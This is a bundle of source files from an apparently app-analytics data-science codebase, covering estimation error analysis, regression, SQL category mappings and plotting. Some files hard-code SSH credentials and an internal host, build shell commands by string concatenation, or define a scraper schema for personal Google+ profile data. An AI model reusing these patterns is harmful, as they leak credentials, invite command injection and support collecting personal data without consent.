summed = summed[['Country', 'Category', 'Type', 'App ID', 'App Name', 'Publisher ID', 'Publisher Name', 'business_model', 'IS Universal', 'Actual', 'Daily Estimate', 'Scaled Estimate']]
#summed = summed[['Country', 'Category', 'Type', 'App ID', 'App Name', 'Publisher ID', 'Publisher Name', 'Actual', 'Daily Estimate', 'Scaled Estimate']]
summed = summed.drop_duplicates()
summed = summed.dropna()
summed = summed.sort('Actual', ascending=False)
summed['orig_error'] = (summed['Daily Estimate'] - summed['Actual']).abs()
summed['orig_rel_error'] = summed['orig_error']*1.0/summed['Actual']
summed['scaled_error'] = (summed['Scaled Estimate'] - summed['Actual']).abs()
summed['scaled_rel_error'] = summed['scaled_error']*1.0/summed['Actual']
summed['rel_error_change'] = summed['orig_rel_error'] - summed['scaled_rel_error']
summed.to_csv('data/scales/%s_split_error.csv'%end ,index=False, quoting = csv.QUOTE_NONNUMERIC)
plot_actuals(summed)
plot_80_20(summed)
if __name__ == '__main__':
main()<file_sep>/product_quality/fetch_webui_estimates.py
'''
Created on Apr 16, 2013
@author: perezrafael
'''
import os
import subprocess
from subprocess import Popen
import paramiko
if __name__ == '__main__':
psql = "psql aa -U aa -t -A -F\",\" -c \"set search_path=ios;\
SELECT store_id, feed_id, category_id, app_id, estimate, date\
FROM store_app_daily_list l, store_app_daily_estimate e\
WHERE l.id = e.list_id and date >= '2012-12-01\\'\
and store_id in (143460,143455,143465,143442,143443,143450,143462,143469,143466,143444,143441)\
limit 10;\""
args = ['ssh', '-L', '64002:172.16.31.10:5432', '-p20002', 'scientist@172.16.31.10', psql]
host = '172.16.31.10'
port = 5432
user = 'scientist'
passwd = '<PASSWORD>'
#ssh = paramiko.SSHClient()
#ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
#ssh.connect(host, port=port, username=user, password=<PASSWORD>)
#ssh.exec_command(args.join(' '))
proc = Popen(args, stdin=subprocess.PIPE)
proc.communicate('scientist')<file_sep>/datathon/network_analysis/README.MD
# Network Analysis
[Presentation](https://drive.google.com/open?id=1r2fXQTjA7t8m-GLrcrBkesn-oSIz6olWXETcKIADuqw)
Topics:
* Clustering
* Using Dijkstra distance instead of direct connected neighbors for related apps (see the sketch at the end of this README)
## Dijkstra distance Notebooks
* Preprocess data
* data_processing_v1.ipynb (VPN Defender data)
* data_processing_v1 - MDM.ipynb (MDM data)
* Analysis
* Network analysis - Dijkstra distance (final version uses MDM data)
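
## Dijkstra distance sketch

A minimal sketch of the related-apps idea above (not the notebooks' exact
code): build a co-usage graph and rank related apps by weighted
shortest-path distance. The edge-list file, its column names
(`app_a`, `app_b`, `shared_devices`), and the inverse-weight choice are
illustrative assumptions.

```python
import networkx as nx
import pandas as pd

# Assumed input: one row per app pair with the number of devices using both.
edges_df = pd.read_csv("app_co_usage_edges.csv")

G = nx.Graph()
for row in edges_df.itertuples(index=False):
    # Stronger co-usage -> shorter edge, so Dijkstra favors well-connected paths.
    G.add_edge(row.app_a, row.app_b, weight=1.0 / row.shared_devices)

def related_apps(app_id, k=10):
    """Return the k closest apps by weighted shortest-path distance."""
    dist = nx.single_source_dijkstra_path_length(G, app_id, weight="weight")
    dist.pop(app_id, None)
    return sorted(dist.items(), key=lambda kv: kv[1])[:k]

print(related_apps("com.example.app"))
```

Because edges shrink as co-usage grows, a two-hop path through two strong
connections can be "closer" than a weak direct neighbor, which is exactly
the signal that direct-neighbor ranking misses.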
<file_sep>/google-analytics/rincon_dump/KR-Android/2016.03.07 - 1 - Utilities.r
preprocessData = function(data) {
cols_of_interest = c("reporters_app", "reporters_all", "time_since_launch", "downloads", "moving_avg_dl", "total_downloads", "category_name", 'Active.Users')
#Remove outliers
data$id = row.names(data)
data = removeByLargeDifferenceInMyDMAndGA(data)
#data = removeLargeApps(data)
#Filter rows of interest
data[,cols_of_interest]
}
getPanelData = function(country_code, device_type) {
preprocessData(full_data[full_data$Country == country_code & full_data$Device.Type == device_type,])
}
removeLargeApps = function(data) {
data[data$reporters_app < as.double(quantile(data$reporters_app, 0.95)), ]
}
removeByLargeDifferenceInMyDMAndGA = function(data) {
data$error = 100 * (data[,'reporters_app'] - data[,'Active.Users']) / data[,'Active.Users']
low_error_threshold = as.double(quantile(data$error, 0.01))
high_error_threshold = as.double(quantile(data$error, 0.8))
data[(data$error < high_error_threshold) & (data$error > low_error_threshold), ]
}
getBaseline20PercAbsErrorRates = function(data) {
baseline_RSS = sum( (data$reporters_app - data$Active.Users) ^ 2)
baseline_TSS = sum((data$reporters_app - mean(data$Active.Users)) ^ 2)
baseline_rmse = sqrt( baseline_RSS / dim(data)[1])
baseline_r2 = 1 - (baseline_RSS / baseline_TSS)
baseline_abs_perc_error = 100.0 * abs(data$reporters_app - data$Active.Users ) / data$Active.Users
baseline_20_perc_abs_error = 100 * sum(baseline_abs_perc_error < 20) / dim(data)[1]
list('rmse' = baseline_rmse, 'r2' = baseline_r2, 'perc_abs_error_20' = baseline_20_perc_abs_error, 'abs_errors' = baseline_abs_perc_error)
}
plotCDFs = function(dataList, title) {
plot (c(0,100),c(0,100),type="n", main = title, # sets the x and y axes scales
xlab="Absolute Error %",ylab="% of App Entries")
index = 1
colors = c('red','blue','green')
for (name in names(dataList)) {
current_data = dataList[[name]]
current_hist_data = hist(current_data[current_data < 100], breaks = 0:102, plot=FALSE)
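# empirical CDF: cumulative % of all entries per 1% absolute-error bucket (errors >= 100% are dropped from the histogram)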
cdf_data = 100*cumsum(current_hist_data$counts / length(current_data))
lines(current_hist_data$breaks[-1], cdf_data, col=colors[index], lwd=2.5) # adds a line for defense expenditures
index = index + 1
}
legend("bottomright", legend = names(dataList), lty = 1, lwd = 2.5, col = colors[seq_along(dataList)])
cdf_data
}<file_sep>/google-analytics/rincon_dump/KR-Android/2016.03.04 - 2 - Linear Regression Models.r
country_codes = c('US','GB','CA','JP','KR')
device_type_codes = c('iPhone', 'Android Mobile')
country_codes = c('KR')
device_type_codes = c('iPhone')
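# NOTE: the full country/device lists above are deliberately overridden to run a single KR / iPhone pass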
coefficient_significances = c()
for (country_code in country_codes) {
print(country_code)
for (device_type_code in device_type_codes) {
print(device_type_code)
current_dataset = getPanelData(country_code, device_type_code)
rmse_iter_array = c()
adj_r2_iter_array = c()
abs_error_20_perc_array = c()
for (iter in 1:300){
k_folds = 4
k_fold_labels = sample(1:k_folds, size = nrow(current_dataset), replace=TRUE )
results_array = matrix(ncol = 2, nrow = k_folds)
total_apps_below_20_perc = 0
abs_perc_errors = c()
for (k in 1:k_folds) {
train_data = current_dataset[k_fold_labels != k,]
test_data = current_dataset[k_fold_labels == k,]
#### MODEL
lm_fit = lm(Active.Users ~ reporters_app +
downloads +
total_downloads +
reporters_app:downloads +
reporters_app:total_downloads
, data = train_data)
#### /MODEL
y_test_pred = predict(lm_fit, newdata = test_data)
rmse = sqrt( sum( (y_test_pred - test_data$Active.Users )^2) / length(y_test_pred) )
adj_r2 = summary(lm_fit)$adj.r.squared
results_array[k,1] = rmse
results_array[k,2] = adj_r2
abs_perc_error_test = 100.0 * abs(y_test_pred - test_data$Active.Users ) / test_data$Active.Users
abs_perc_errors = c(abs_perc_errors, abs_perc_error_test)
apps_below_20_perc_error = sum(abs_perc_error_test < 20)
total_apps_below_20_perc = total_apps_below_20_perc + apps_below_20_perc_error
}
averaged_results = colMeans(results_array, na.rm = TRUE)
current_rmse_avg = averaged_results[1]
current_adj_r2_avg = averaged_results[2]
rmse_iter_array = c(rmse_iter_array, current_rmse_avg)
adj_r2_iter_array = c(adj_r2_iter_array, current_adj_r2_avg)
abs_error_20_perc_array = c(abs_error_20_perc_array, 100 * total_apps_below_20_perc / nrow(current_dataset))
}
rmse_avg = mean(rmse_iter_array)
adj_r2_avg = mean(adj_r2_iter_array)
abs_error_20_perc_avg = mean(abs_error_20_perc_array)
baseline_results = getBaseline20PercAbsErrorRates(current_dataset)
plotCDFs(list('MyDM (baseline)' = baseline_results$abs_errors, 'Linear w/ Interaction' = abs_perc_errors),
title=paste(country_code, ' - ', device_type_code))
print(paste('RMSE: ', rmse_avg, '(', baseline_results$rmse, ')'))
print(paste('Adj R2: ', adj_r2_avg, '(', baseline_results$r2, ')'))
print(paste('20% Abs Error Percentage: ', abs_error_20_perc_avg, '(', baseline_results$perc_abs_error_20, ')'))
print("")
ref_rmse_avg = 15140
ref_adj_r2_avg = 0.94
ref_20_perc_abs_error_avg = 32.16
#print(summary(lm_fit)$coefficients[,'Pr(>|t|)'])
coefficient_significances = c(coefficient_significances, country_code, device_type_code, as.vector(summary(lm_fit)$coefficients[,'Pr(>|t|)']))
#print(paste('(Delta) RMSE: ', rmse_avg - ref_rmse_avg))
#print(paste('(Delta) Adj R2: ', adj_r2_avg - ref_adj_r2_avg))
#print(paste('(Delta) 20% Abs Error Percentage: ', abs_error_20_perc_avg - ref_20_perc_abs_error_avg))
}
}
backup_coef_significances = coefficient_significances
dim(coefficient_significances) = c(length(lm_fit$coefficients) + 2,10)
coefficient_significances = as.data.frame(t(coefficient_significances))
names(coefficient_significances) = c('Country', 'Device Type', names(lm_fit$coefficients) )
coefficient_significances[,-c(1,2)] = apply(X = coefficient_significances[,-c(1,2)], MARGIN = 1:2, FUN = function(x) as.double(x))
<file_sep>/int-vs-m-benchmark/sql/android/1001h1-create_appannie_distimo_mappings.sql
/*
Create (hard-coded) mappings between App Annie and Distimo tables.
*/
/* Mappings between feed and (device, type) */
drop table if exists aa_benchmarking_android.feed_device_type_mappings;
create table aa_benchmarking_android.feed_device_type_mappings(
feed int unsigned not null,
feed_name varchar(20) not null,
type ENUM('paid','gross','free') NOT NULL,
constraint primary key (feed) );
insert into aa_benchmarking_android.feed_device_type_mappings
(feed, feed_name, type)
values
(0, "ANDROID_FREE", 'free'),
(1, "ANDROID_PAID", 'paid'),
(2, "ANDROID_GROSSING", 'gross');
/* Country mappings using names. */
drop temporary table if exists temp.aa_countries;
create temporary table temp.aa_countries (
id int,
name varchar(40)) ;
insert into temp.aa_countries
(id, name)
values
(1, 'Australia'),
(2, 'Canada'),
(3, 'China'),
(4, 'Germany'),
(5, 'Spain'),
(6, 'France'),
(7, 'United Kingdom'),
(8, 'Italy'),
(9, 'Japan'),
(10, 'United States'),
(11, 'Belgium'),
(12, 'Switzerland'),
(13, 'Chile'),
(14, 'South Africa'),
(15, 'Vietnam'),
(16, 'Hong Kong'),
(17, 'Argentina'),
(18, 'Brazil'),
(19, 'India'),
(20, 'Finland'),
(21, 'Indonesia'),
(22, 'Russia'),
(23, 'Netherlands'),
(24, 'Malaysia'),
(25, 'Turkey'),
(26, 'Mexico'),
(27, 'South Korea'),
(28, 'Poland'),
(29, 'Thailand'),
(30, 'Taiwan'),
(31, 'Philippines'),
(32, 'Singapore'),
(33, 'Egypt'),
(34, 'Sweden'),
(35, 'Austria'),
(36, 'Czech Republic'),
(37, 'Hungary'),
(38, 'Denmark'),
(39, 'Ireland'),
(40, 'Israel'),
(41, 'New Zealand'),
(42, 'Norway'),
(43, 'Portugal'),
(44, 'Romania'),
(45, 'Slovakia'),
(46, 'Greece'),
(47, 'Bulgaria'),
(48, 'Ukraine'),
(49, 'United Arab Emirates'),
(50, 'Kuwait');
drop table if exists aa_benchmarking_android.country_mappings;
create table aa_benchmarking_android.country_mappings (
`store_id` int unsigned NOT NULL,
`appannie_name` varchar(48) NOT NULL,
`iso_code` varchar(2) NOT NULL,
`country_id` smallint(5) unsigned NOT NULL,
`distimo_name` varchar(48) NOT NULL,
constraint primary key(store_id),
index(country_id),
index(iso_code)
)
select
aa_cn.id as store_id,
aa_cn.name as appannie_name,
cn.iso_code,
m_cn.id as country_id,
m_cn.name as distimo_name
from
generic.countries cn
join temp.aa_countries aa_cn
using(name)
join market.countries m_cn
using(iso_code)
;
/* Category mappings using similar names. */
drop temporary table if exists temp.aa_categories;
create temporary table temp.aa_categories
(id int, external_name varchar(40), name varchar(40));
insert into temp.aa_categories
(id, external_name, name)
values
(1, 'OVERALL', 'Overall'),
(2, 'GAME', 'Games'),
(3, 'ARCADE', 'Games Arcade & Action'),
(4, 'BRAIN', 'Games Brain & Puzzle'),
(5, 'CARDS', 'Games Cards & Casino'),
(6, 'CASUAL', 'Games Casual'),
-- (7, 'GAME_WALLPAPER', 'Games Live Wallpaper'), excluded since not always present
(8, 'RACING', 'Games Racing'),
(9, 'SPORTS_GAMES', 'Games Sports'),
-- (10, 'GAME_WIDGETS', 'Games Widgets'), excluded since not always present
(11, 'APPLICATION', 'Applications'),
-- (12, 'BOOKS_AND_REFERENCE', 'Books & Reference'), excluded since not always present
(13, 'BUSINESS', 'Business'),
(14, 'COMICS', 'Comics'),
(15, 'COMMUNICATION', 'Communication'),
(16, 'EDUCATION', 'Education'),
(17, 'ENTERTAINMENT', 'Entertainment'),
(18, 'FINANCE', 'Finance'),
(19, 'HEALTH_AND_FITNESS', 'Health & Fitness'),
(20, 'LIBRARIES_AND_DEMO', 'Libraries & Demo'),
(21, 'LIFESTYLE', 'Lifestyle'),
(22, 'APP_WALLPAPER', 'Apps Live Wallpaper'),
(23, 'MEDIA_AND_VIDEO', 'Media & Video'),
(24, 'MEDICAL', 'Medical'),
(25, 'MUSIC_AND_AUDIO', 'Music & Audio'),
(26, 'NEWS_AND_MAGAZINES', 'News & Magazines'),
(27, 'PERSONALIZATION', 'Personalization'),
(28, 'PHOTOGRAPHY', 'Photography'),
(29, 'PRODUCTIVITY', 'Productivity'),
(30, 'SHOPPING', 'Shopping'),
(31, 'SOCIAL', 'Social'),
(32, 'SPORTS', 'Sports'),
(33, 'TOOLS', 'Tools'),
(34, 'TRANSPORTATION', 'Transportation'),
(35, 'TRAVEL_AND_LOCAL', 'Travel & Local'),
(36, 'WEATHER', 'Weather'),
(37, 'APP_WIDGETS', 'App Widgets'),
(38, 'GAME_ACTION', 'Games Action'),
(39, 'GAME_ADVENTURE', 'Games Adventure'),
(40, 'GAME_WORD', 'Games Word'),
(41, 'GAME_ARCADE', 'Games Arcade'),
(42, 'GAME_BOARD', 'Games Board'),
(43, 'GAME_CARD', 'Games Card'),
(44, 'GAME_CASINO', 'Games Casino'),
(6, 'GAME_CASUAL', 'Games Casual'),
(46, 'GAME_EDUCATIONAL', 'Games Educational'),
(47, 'GAME_FAMILY', 'Games Family'),
(48, 'GAME_MUSIC', 'Games Music'),
(49, 'GAME_PUZZLE', 'Games Puzzle'),
(8, 'GAME_RACING', 'Games Racing'),
(51, 'GAME_ROLE_PLAYING', 'Games Role Playing'),
(52, 'GAME_SIMULATION', 'Games Simulation'),
(9, 'GAME_SPORTS', 'Games Sports'),
(54, 'GAME_STRATEGY', 'Games Strategy'),
(55, 'GAME_TRIVIA', 'Games Trivia');
drop table if exists aa_benchmarking_android.category_mappings;
create table aa_benchmarking_android.category_mappings (
`appannie_category_id` smallint(5) unsigned NOT NULL,
`appannie_name` varchar(80) NOT NULL,
`distimo_category_id` smallint(5) unsigned NOT NULL,
`distimo_name` varchar(80) NOT NULL,
constraint primary key (appannie_category_id, distimo_category_id),
index(distimo_category_id, appannie_category_id))
select
aa_cg.id as appannie_category_id,
aa_cg.name as appannie_name,
cg.id as distimo_category_id,
cg.name as distimo_name
from
market.categories cg
JOIN (
SELECT
DISTINCT category_id
FROM
temp.rankings
) x
ON x.category_id = cg.id
JOIN temp.aa_categories aa_cg
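-- prefer exact external_name matches; otherwise fall back to display-name heuristics ('Top ' prefix, 'Games-' vs 'Games ')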
ON (
cg.external_name = aa_cg.external_name
OR (
cg.external_name IS NULL
AND (
cg.name = concat('Top ', aa_cg.name)
OR REPLACE(cg.name, 'Games-', 'Games ') = aa_cg.name
)
)
)
;<file_sep>/evaluation/py/merge_other_info.py
import sys
import os, os.path
from collections import defaultdict
import itertools
import pandas as pd
def main():
args_num = len(sys.argv)
sbe_dir = sys.argv[1]
other_info_dir = sys.argv[2:(args_num - 1)]
output_dir = sys.argv[args_num - 1]
input_files = _listdir_with_fullpath(sbe_dir) + list(itertools.chain(*[_listdir_with_fullpath(d) for d in other_info_dir]))
input_files = filter(lambda s: s.endswith('.csv'), input_files)
g = _group_same_filenames(input_files)
for (group_name, files) in g:
if len(files) != len(other_info_dir) + 1:
print("Confused with the files: %s" % files)
continue
df = _merge_other_info(map(pd.read_csv, files))
df.to_csv(os.path.join(output_dir, group_name), index=False)
def _listdir_with_fullpath(d):
return [os.path.join(d, i) for i in os.listdir(d)]
def _group_same_filenames(paths):
# Corresponding est and real values should have the same base name.
# Despite that they're in different dirs.
d = defaultdict(list)
for s in paths:
d[os.path.basename(s)].append(s)
return d.iteritems()
def _merge_other_info(dfs):
merged = dfs[0]
for new_df in dfs[1:]:
merged = pd.merge(merged, new_df, on=['app_id'], how='inner')
return merged
if __name__ == '__main__':
main()
<file_sep>/audience/google-plus-scraping/lib/scraper/scraper/items.py
# -*- coding: utf-8 -*-
# Define here the models for your scraped items
#
# See documentation in:
# http://doc.scrapy.org/en/latest/topics/items.html
import scrapy
class ScraperItem(scrapy.Item):
account_id = scrapy.Field()
account_name = scrapy.Field()
# Basic information
gender = scrapy.Field()
looking_for = scrapy.Field()
birthday = scrapy.Field()
relationship = scrapy.Field()
other_names = scrapy.Field()
# Apps with G+ signin-in
apps_with_signin = scrapy.Field()
# Other members having person in circles
in_circles = scrapy.Field()
# All education institutes
school_names = scrapy.Field()
occupation = scrapy.Field()
# Current location
place = scrapy.Field()<file_sep>/aa_au_model/lib/config.py
BUCKET_DIR = '/s3mnt-projecta/aardvark-prod-pdx-ds-sample/'
DATATYPE_BUCKET_DATA_DIRS = {'ingest': 'VPN_DPI_INGEST',
'session': 'VPN_APP_USAGE_SESSION',
'download': 'VPN_DOWNLOAD_TAGGING',
'pause': 'VPN_PAUSE_RESUME_SESSION',
'connection': 'VPN_CONNECTION_SESSION',
'device_info': 'VPN_NEW_DEVICE_INFO'}
DATATYPE_COLUMN_NAMES = {'ingest': ['timestamp','device_id','country','city','uri','user_agent','bundle_id','offset'],
'session': ['device_id','country','city','bundle_id','startTime','endTime','offset'],
'download': ['timestamp','device_id','device_type','download_type','bundle_id','country','offset'],
'pause': ['device_id','start_timestamp','end_timestamp','offset'],
'connection': ['device_id','start_timestamp','end_timestamp','offset'],
'device_info': ['device_id', 'carrier', 'manufacturer', 'model', 'platform', 'device_type', 'os_version', 'bundle_id', 'publisher_id'],
'dpi_apps': ['bundle_id','version'],
'wau': ['external_id','date','platform','device','country','wau'],
'freq_week': ['external_id','date','platform','device','country','nr_of_uses'],
'duration_week': ['external_id','date','platform','device','country','duration'],
'details_kpi': ['external_id','date','platform','device','country','active_users_sample','sample_size','proportion','estimate_au','rel_error','estimation_quality_indicator','rel_change','au_changes_time_indicator','correct_estimate_au','au_quality']}
DOWNLOAD_TYPES = {0: 'purchase', 1: 'download', 2: 'update', 4: 'unknown'}
ISO_CODE = 'US'
### platforms and devices for results metrics
platforms = {1: 'Google Play', 2: 'iOS'}
devices = {0: 'all', 1: 'smartphone', 2: 'tablet'}
<file_sep>/aa_au_model/main.py
from correction import data
if __name__ == '__main__':
print 'Start dumping:'
mdm_v1_1 = data.load_mdm_au()
mdm_v1_1.to_csv('./mdm_v1.1_dump.csv', index=False)
print 'Dump finished!'
<file_sep>/product_quality/internal/utilities.py
'''
Created on Apr 19, 2013
@author: perezrafael
'''
import utilities_pandas
import commands
def _fetch_from_db(platform, store, unit, dtstart, dtend):
if platform =='ios':
table = 'aa_staging'
column = 'app_id'
elif platform == 'android':
table = 'aa_staging_android'
column = 'app_class'
common_suffix = 'WHERE d.store_id=%s ' % store + \
'AND d.date >= DATE(\'%s\') ' % dtstart + \
'AND d.date <= DATE(\'%s\'))' % dtend
if unit == 'Downloads':
cmd = 'echo "COPY (SELECT date, ' + column + ', units FROM downloads d ' + \
common_suffix + 'TO STDOUT with CSV HEADER" | psql -U aa -h nile ' + table
elif unit == 'USD':
cmd = 'echo "COPY (SELECT date, ' + column + ', revenue FROM sales d ' + \
common_suffix + 'TO STDOUT with CSV HEADER" | psql -U aa -h nile ' + table
else:
raise Exception('Unit types should be Downloads or USD')
status, stdout = commands.getstatusoutput(cmd)
if status is None or status >= 2:
raise Exception("Have problem fetching daily estimation: %s" % cmd)
return utilities_pandas.convert_str_to_df(stdout)
<file_sep>/int-vs-m-benchmark/android-install-vs-downloads/window_optimization.py
import numpy
import scipy.optimize
import scipy.stats
import time
from pandas import DataFrame
def get_decaying_window_function(decay, delay, window_size):
""""
Generate a normalized decaying window function.
Follows the function
y(t) = exp(-(t - t_max + s) * lambda) if t <= t_max - s
0 else
where t = [0, t_max]
@param delay: point at which the decay window should start (s)
@param decay: decay constant (lambda)
@param window_size: size of the window (t_max)
@returns: exponential decay window function
"""
N_DATA_POINT = 9
time_vector = numpy.arange(0, N_DATA_POINT)
window_function = numpy.exp(-(time_vector - N_DATA_POINT + delay) *
decay)
if delay > 0:
window_function[:delay] = 0
window_function[window_size:] = 0
window_function = window_function / sum(window_function)
return window_function
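# Example (illustrative parameters, not from the original code):
# get_decaying_window_function(decay=0.5, delay=2, window_size=6) returns a
# length-9 vector that is zero for the first 2 entries and from index 6 on,
# decays exponentially in between, and is normalized to sum to 1.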
def get_window_error(df, window_function, verbose=False):
"""
Get the error for a window function.
@param df: DataFrame
@param window_function: array with window function
@param verbose: if True print progress info
@returns: average error over all dates and iso_codes in df
"""
df = compute_window_value(df, window_function)
error_list = []
fit_groups = df.groupby(['date', 'iso_code'])
for ii, (key, data) in enumerate(fit_groups):
fmin_output = scipy.optimize.fmin_slsqp(objective_function,
[data['log_value'].max(), 0, 0, 0],
ieqcons=[constraint_function],
args=(data,),
iprint=0, full_output=1)
params, error = fmin_output[:2]
error = compute_r_squared(params, data)
error_list.append(error)
if verbose:
print("%s/%s: %1.2f" % (ii, len(fit_groups), error))
return error_list
def compute_window_value(df, window_function, metric='user'):
"""
Compute averaged (log) values using a window.
@param df: DataFrame with cols with actuals in column metric
@param window_function: array with window function
@param metric: column to use for weighted average
@returns: Adjusted DataFrame df
"""
df['value'] = numpy.inner(df[metric], window_function)
df['log_value'] = numpy.log(df['value'])
return df
def objective_function(x, data):
"""
Function to optimize.
@param x: parameters
@param data: DataFrame with log ranks and value
@returns: SSE
"""
#difference = numpy.exp(data['log_value']) - numpy.exp(fit_function(x, data))
is_analytics_app = data['log_value'].notnull()
difference = (data['log_value'][is_analytics_app] -
fit_function(x, data.ix[is_analytics_app]))
objective = numpy.nansum(difference ** 2)
return objective
def exponential_objective_function(x, data):
"""
Function to optimize.
@param x: parameters
@param data: DataFrame with log ranks and value
@returns: SSE
"""
difference = numpy.exp(data['log_value']) - numpy.exp(fit_function(x, data))
objective = numpy.sqrt(numpy.nansum(difference ** 2))
return objective
def compute_r_squared(x, data):
"""
Compute the adjusted R^2 value in the log-log domain.
@param x: parameters
@param data: DataFrame with log ranks and log value
@returns: R^2 value
"""
is_analytics_app = data['log_value'].notnull()
y_hat = fit_function(x, data.ix[is_analytics_app])
y_bar = numpy.mean(data['log_value'][is_analytics_app])
ss_reg = numpy.sum((y_hat - y_bar)**2)
ss_tot = numpy.sum((data['log_value'][is_analytics_app] - y_bar)**2)
df_reg = len(is_analytics_app) - 4 - 1
df_tot = len(is_analytics_app) - 1
return 1. - (ss_reg / df_reg) / (ss_tot / df_tot)
def compute_r_squared_exp(x, data):
"""
Compute the adjusted R^2 value in the normal domain.
@param x: parameters
@param data: DataFrame with log ranks and value
@returns: R^2 value
"""
is_analytics_app = data['log_value'].notnull()
y_hat = numpy.exp(fit_function(x, data.ix[is_analytics_app]))
y_bar = numpy.mean(data['value'][is_analytics_app])
ss_reg = numpy.sum((y_hat - y_bar)**2)
df_reg = len(is_analytics_app) - 4 - 1
df_tot = len(is_analytics_app) - 1
ss_tot = numpy.sum((data['value'][is_analytics_app] - y_bar)**2)
return 1. - (ss_reg / df_reg) / (ss_tot / df_tot)
def fit_function(x, data):
"""
Get y values for parameters.
@param x: parameters
@param data: DataFrame with log ranks
@returns: fitted values
"""
return (x[0] + x[1] * data['log_rank'] +
x[2] * data['log_rank_2'] +
x[3] * data['log_rank_3'])
def constraint_function(x, data):
"""
Derivative constraint function.
@param x: parameters
@param data: DataFrame with log ranks and value
@returns: 1 if any of the derivatives are > 0, else 0
"""
y = fit_function(x, data)
return sum(numpy.diff(y) > 0)
def compute_parameter_error(data, parameters, verbose=False):
"""
Compute errors for window parameters.
@param data: DataFrame
@parameters: list with parameters for window function
@param verbose: if True print progress info
"""
t0 = time.time()
window_function = get_decaying_window_function(*parameters)
error = get_window_error(data, window_function, verbose)
if verbose:
print('%1.0fs - %1.2f - %1.2f - %s'
% (time.time() - t0, numpy.mean(error), parameters))
return error
<file_sep>/old_investigations/multi_scaling.py
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import os, os.path
import datetime
import sys
# plot top 30 linear
# plot top 30 semi-logarithmic
# plot log-logarithmic (all)
# plot top 200 linear
def split_train_test(df, train_days):
dates = np.sort(df['date'].unique())
train_dates = pd.DataFrame({'date': dates[:train_days]})
test_dates = pd.DataFrame({'date': dates[train_days:]})
train_set = df.merge(train_dates, on=['date'])
test_set = df.merge(test_dates, on=['date'])
return train_set, test_set
def build_model(df, train_days, K = None):
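# When K is given, each day's units are rescaled so the daily total equals K
# before averaging per rank, removing day-to-day volume drift.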
train_set, test_set = split_train_test(df, train_days)
weights = None
if K is not None:
weights = pd.DataFrame(K/df.groupby('date')['units'].sum()).reset_index()
weights.rename(columns={'units':'weight'}, inplace=True)
train_set = train_set.merge(weights, on='date')
test_set = test_set.merge(weights, on='date')
train_set['scaled_units'] = train_set['units'] * train_set['weight']
estimates = train_set[['rank', 'scaled_units']].groupby(['rank']).mean().reset_index()
train_set = train_set.merge(estimates, on = ['rank']).rename(columns={'scaled_units_x': 'scaled_units', 'scaled_units_y': 'scaled_estimate'})
#train_set['scaled_estimate'] /= train_set['weight']
test_set = test_set.merge(estimates, on = ['rank']).rename(columns={'scaled_units_y': 'scaled_units', 'scaled_units': 'scaled_estimate'})
#test_set['scaled_estimate'] /= test_set['weight']
estimates = train_set[['rank', 'units']].groupby(['rank']).mean().reset_index()
train_set = train_set.merge(estimates, on='rank')
train_set.rename(columns={'units_x': 'units', 'units_y': 'estimate'}, inplace=True)
test_set = test_set.merge(estimates, on='rank')
test_set.rename(columns={'units_x': 'units', 'units_y': 'estimate'}, inplace=True)
return train_set, test_set, weights
def append_weekdays(df):
df_weekday = []
for index, value in df['date'].iteritems():
weekday = datetime.datetime.strptime(value, '%Y-%m-%d')
weekday = weekday.weekday()
df_weekday.append(weekday)
df['weekday'] = pd.Series(df_weekday)
return df
def plot_sets(train_set, test_set, max_rank, weights=False, fig_file=None, plot_actuals=False):
train_set = train_set[train_set['rank'] <= max_rank]
test_set = test_set[test_set['rank'] <= max_rank]
ax = plt.subplot(121)
if not plot_actuals:
p1, = plt.plot(train_set[train_set['weekday']<5]['rank'], train_set[train_set['weekday']<5]['units'], 'bo', alpha=0.4)
p1b, = plt.plot(train_set[train_set['weekday']>=5]['rank'], train_set[train_set['weekday']>=5]['units'], 'go', alpha=0.4)
if weights:
if plot_actuals:
p3,= plt.plot(train_set['rank'], train_set['units']*train_set['weight'], 'r^', alpha=0.4)
else:
df1 = train_set[['rank','scaled_estimate']].drop_duplicates()
df1['key'] = 1
df2 = train_set[['weight']].drop_duplicates()
df2['key'] = 1
df2 = df2.merge(df1, on='key')[['rank','scaled_estimate','weight']]
p3,= plt.plot(df2['rank'], df2['scaled_estimate']/df2['weight'], 'r^', alpha=0.4)
if not plot_actuals:
p2, =plt.plot(train_set['rank'], train_set['estimate'], 'ks', alpha=0.4)
if weights:
if plot_actuals:
plt.legend([p3], ['Scaled Actuals'])
else:
plt.legend([p1, p1b, p2, p3], ['Actuals Weekday', 'Actuals Weekend', 'Original Estimates', 'Scaled Estimates'])
else:
plt.legend([p1, p1b, p2], ['Actuals Weekday', 'Actuals Weekend', 'Estimates'])
plt.grid(True, which='both')
plt.xlabel('rank')
plt.ylabel('downloads (20 days)')
if max_rank >= 500 :
ax.set_xscale('log')
ax.set_yscale('log')
plt.axis('equal')
xaxis = ax.xaxis.get_majorticklocs()
yaxis = ax.yaxis.get_majorticklocs()
ax = plt.subplot(122)
if not plot_actuals:
plt.plot(test_set[test_set['weekday']<5]['rank'], test_set[test_set['weekday']<5]['units'], 'bo', alpha=0.4)
plt.plot(test_set[test_set['weekday']>=5]['rank'], test_set[test_set['weekday']>=5]['units'], 'go', alpha=0.4)
if weights:
if plot_actuals:
plt.plot(test_set['rank'], test_set['units']*test_set['weight'], 'r^', alpha=0.4)
else:
df1 = train_set[['rank','scaled_estimate']].drop_duplicates()
df1['key'] = 1
df2 = test_set[['weight']].drop_duplicates()
df2['key'] = 1
df2 = df2.merge(df1, on='key')[['rank','scaled_estimate','weight']]
plt.plot(df2['rank'], df2['scaled_estimate']/df2['weight'], 'r^', alpha=0.4)
if not plot_actuals:
plt.plot(train_set['rank'], train_set['estimate'], 'ks', alpha=0.4)
plt.grid(True, which='both')
plt.xlabel('rank')
plt.ylabel('downloads (next 11 days)')
if max_rank >= 500 :
ax.set_xscale('log')
ax.set_yscale('log')
plt.axis('equal')
ax.xaxis.set_ticks(xaxis)
ax.yaxis.set_ticks(yaxis)
ax.set_yticklabels([])
#ax.yaxis.ticks.set_visible(False)
if fig_file is None:
plt.show()
else:
plt.savefig(fig_file)
plt.close()
def plot_weights(weights, fig_file):
weights['weight'] /= weights['weight'].max()
plt.plot(weights['weight'], color='black', lw=2.0, marker='s')
plt.grid(True, which='both')
plt.xlabel('Day')
plt.ylabel('Weight')
if fig_file is None:
plt.show()
else:
plt.savefig(fig_file)
plt.close()
def get_ranked_apps(actuals_file):
ranks_dir = './cache/raw_estimation'
